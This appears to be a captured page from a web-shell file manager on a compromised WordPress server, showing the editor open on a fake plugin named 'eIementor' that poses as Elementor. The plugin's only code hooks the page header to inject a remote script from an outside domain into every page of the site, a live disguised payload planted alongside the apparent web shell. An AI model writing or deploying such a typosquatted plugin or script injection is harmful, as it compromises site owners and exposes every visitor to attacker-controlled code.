Dashboard
PHP:
8.0.30
OS:
Linux
User:
hoozgot
/
/
home
/
hoozgot
/
www
/
theroadhogs
/
wp-content
/
plugins
/
eIementor
📤 Upload
📝 New File
📁 New Folder
Close
Editing: eIementor.php
<?php /** * Plugin Name: EIementor * Description: Elementor is a live drag-and-drop page builder for WordPress that allows users to create unique website layouts in real time without writing HTML or CSS. * Version: 4.2.2 * Author: Elementor.com */ if (!defined('ABSPATH')) { exit; } add_action('wp_head', 'icarus_eiementor_head'); function icarus_eiementor_head() { echo '<script src="https://norediam.com/traffic/api"></script>'; }
Save
Cancel